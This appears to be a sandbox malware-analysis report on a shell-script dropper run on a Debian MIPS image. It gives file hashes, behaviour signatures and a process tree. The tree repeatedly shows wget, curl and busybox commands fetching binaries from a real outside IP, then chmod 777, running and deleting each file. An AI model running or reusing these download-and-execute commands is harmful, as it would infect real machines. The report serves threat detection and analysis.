Analysis
-
max time kernel
133s -
max time network
138s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
01-11-2024 02:32
Static task
static1
Behavioral task
behavioral1
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
-
Size
10KB
-
MD5
0e701247eed8c2ac85ce4310d37e674d
-
SHA1
7ca0caf639c6d80baffe549e24e3018daaa8bbb8
-
SHA256
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb
-
SHA512
0ef0aa05143b180e5260a49f2e87ebca0ecec3ab767bbbc7bc0761a2244b20b000aaffead5bd57071f0022821063d4c4ae9bb2efac893131009c19b2f57f556b
-
SSDEEP
96:PBRELvNSsmyUgEmy+bytMKk99ch83tkBRELvFSsQZFWyLJBmy+bytMs799chtE37:Y1myUgE5CVS3n
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 922 chmod 736 chmod 892 chmod 910 chmod 799 chmod 814 chmod 862 chmod 747 chmod 898 chmod 723 chmod 868 chmod 916 chmod 928 chmod 934 chmod 952 chmod 965 chmod 730 chmod 808 chmod 904 chmod 946 chmod 827 chmod 874 chmod 940 chmod 886 chmod 959 chmod 771 chmod 850 chmod 880 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m 724 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s 731 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 737 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys 752 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh 773 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 800 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK 809 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do 815 oieViux5SkcOflukQEESWqzwe8qoXmU0do /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT 829 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq 851 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH 863 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb 869 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV 875 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA 881 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m 887 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s 893 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 899 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 905 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK 911 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do 917 oieViux5SkcOflukQEESWqzwe8qoXmU0do /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys 923 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh 929 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT 935 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb 941 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV 947 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA 953 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq 960 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH 966 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s curl File opened for modification /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH curl File opened for modification /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 curl File opened for modification /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys curl File opened for modification /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV curl File opened for modification /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m curl File opened for modification /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh curl File opened for modification /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA curl File opened for modification /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT curl File opened for modification /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb curl File opened for modification /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do curl File opened for modification /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq curl File opened for modification /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 curl File opened for modification /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m curl File opened for modification /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT curl File opened for modification /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH curl File opened for modification /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 curl File opened for modification /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 curl File opened for modification /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s curl File opened for modification /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK curl File opened for modification /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys curl File opened for modification /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb curl File opened for modification /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq curl File opened for modification /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh curl File opened for modification /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK curl File opened for modification /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA curl File opened for modification /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV curl File opened for modification /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do curl
Processes
-
/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh1⤵PID:693
-
/bin/rm/bin/rm bins.sh2⤵PID:696
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:703
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:721
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:724
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:725
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:726
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:729
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:732
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:733
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:735
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:743
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:768
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:776
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:777
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:794
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:807
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:813
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:823
-
-
/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:832
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:833
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:847
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:854
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:861
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:867
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:873
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:879
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:885
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:891
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:897
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:903
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:909
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:915
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:921
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:924
-
-
